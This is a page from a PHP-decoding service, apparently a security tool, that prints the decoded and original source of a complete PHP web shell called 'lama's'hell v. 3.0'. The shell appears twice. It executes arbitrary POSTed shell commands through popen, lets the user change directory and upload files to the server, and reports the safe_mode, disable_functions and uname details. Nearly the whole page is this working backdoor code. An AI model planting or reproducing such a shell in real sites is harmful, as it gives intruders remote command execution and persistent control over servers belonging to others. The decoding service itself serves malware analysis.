Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<? if($_POST['dir'] == "") { $curdir = `pwd`; } else { $curdir = $_POST['dir']; }..

Decoded Output download

<? 
if($_POST['dir'] == "") { 
 
 $curdir = `pwd`; 
} else { 
 $curdir = $_POST['dir']; 
} 
 
if($_POST['king'] == "") { 
 
 $curcmd = "ls -lah"; 
} else { 
 $curcmd = $_POST['king']; 
} 
 
 
?> 
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" 
                        "http://www.w3.org/TR/html4/loose.dtd"> 
<html> 
  <head> 
    <title>lama's'hell v. 3.0</title> 
    <style type="text/css"> 
     body { 
      color: white; background-color: black; 
      font-size: 12px; 
      font-family: Helvetica,Arial,Sans-Serif; 
     } 
    </style> 
  </head> 
  <body> 
    <pre> 
                              _           _ 
                             / \_______ /|_\ 
                            /          /_/ \__ 
                           /             \_/ / 
                         _|_              |/|_ 
                         _|_  O    _    O  _|_ 
                         _|_      (_)      _|_ 
                          \                 / 
                           _\_____________/_ 
                          /  \/  (___)  \/  \ 
                          \__(  o     o  )__/ <? 
$ob = @ini_get("open_basedir"); 
$df = @ini_get("disable_functions"); 
if( ini_get('safe_mode') ) { 
   echo "SM: 1 \ "; 
} else { 
   echo "SM: 0 \ "; 
} 
if(''==$df) { 
   echo "DF: 0 \ "; 
} else { 
   echo "DF: ".$df." \ "; 
} 
echo "".php_uname()."
"; 
?> 
<hr></pre> 
    <table><form method="post" enctype="multipart/form-data"> 
      <tr><td><b>Execute command:</b></td><td><input name="king" type="text" size="100" value="<? echo $curcmd; ?>"></td> 
      <tr><td><b>Change directory:</b></td><td><input name="dir" type="text" size="100" value="<? echo $curdir; ?>"></td> 
      <td><input name="exe" type="submit" value="Execute"></td></tr> 
 
      <tr><td><b>Upload file:</b></td><td><input name="fila" type="file" size="90"></td> 
      <td><input name="upl" type="submit" value="Upload"></td></tr> 
    </form></table> 
<pre><hr> 
<? 
    if(($_POST['upl']) == "Upload" ) { 
    if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir."/".$_FILES['fila']['name'])) { 
        echo "The file has been uploaded<br><br>"; 
    } else { 
        echo "There was an error uploading the file, please try again!"; 
    } 
    } 
    if(($_POST['exe']) == "Execute") { 
     $curcmd = "cd ".$curdir.";".$curcmd; 
     $f=popen($curcmd,"r"); 
     while (!feof($f)) { 
      $buffer = fgets($f, 4096); 
      $string .= $buffer; 
     } 
     pclose($f); 
     echo htmlspecialchars($string); 
    } 
?> 
    </pre> 
  </body> 
</html> 

Did this file decode correctly?

Original Code

<?
if($_POST['dir'] == "") {

 $curdir = `pwd`;
} else {
 $curdir = $_POST['dir'];
}

if($_POST['king'] == "") {

 $curcmd = "ls -lah";
} else {
 $curcmd = $_POST['king'];
}


?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
                        "http://www.w3.org/TR/html4/loose.dtd">
<html>
  <head>
    <title>lama's'hell v. 3.0</title>
    <style type="text/css">
     body {
      color: white; background-color: black;
      font-size: 12px;
      font-family: Helvetica,Arial,Sans-Serif;
     }
    </style>
  </head>
  <body>
    <pre>
                              _           _
                             / \_______ /|_\
                            /          /_/ \__
                           /             \_/ /
                         _|_              |/|_
                         _|_  O    _    O  _|_
                         _|_      (_)      _|_
                          \                 /
                           _\_____________/_
                          /  \/  (___)  \/  \
                          \__(  o     o  )__/ <?
$ob = @ini_get("open_basedir");
$df = @ini_get("disable_functions");
if( ini_get('safe_mode') ) {
   echo "SM: 1 \\ ";
} else {
   echo "SM: 0 \\ ";
}
if(''==$df) {
   echo "DF: 0 \\ ";
} else {
   echo "DF: ".$df." \\ ";
}
echo "".php_uname()."\n";
?>
<hr></pre>
    <table><form method="post" enctype="multipart/form-data">
      <tr><td><b>Execute command:</b></td><td><input name="king" type="text" size="100" value="<? echo $curcmd; ?>"></td>
      <tr><td><b>Change directory:</b></td><td><input name="dir" type="text" size="100" value="<? echo $curdir; ?>"></td>
      <td><input name="exe" type="submit" value="Execute"></td></tr>

      <tr><td><b>Upload file:</b></td><td><input name="fila" type="file" size="90"></td>
      <td><input name="upl" type="submit" value="Upload"></td></tr>
    </form></table>
<pre><hr>
<?
    if(($_POST['upl']) == "Upload" ) {
    if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir."/".$_FILES['fila']['name'])) {
        echo "The file has been uploaded<br><br>";
    } else {
        echo "There was an error uploading the file, please try again!";
    }
    }
    if(($_POST['exe']) == "Execute") {
     $curcmd = "cd ".$curdir.";".$curcmd;
     $f=popen($curcmd,"r");
     while (!feof($f)) {
      $buffer = fgets($f, 4096);
      $string .= $buffer;
     }
     pclose($f);
     echo htmlspecialchars($string);
    }
?>
    </pre>
  </body>
</html>

Function Calls

None

Variables

None

Stats

MD5 2a1d54937ec6706235ceb7dc73d4736d
Eval Count 0
Decode Time 77 ms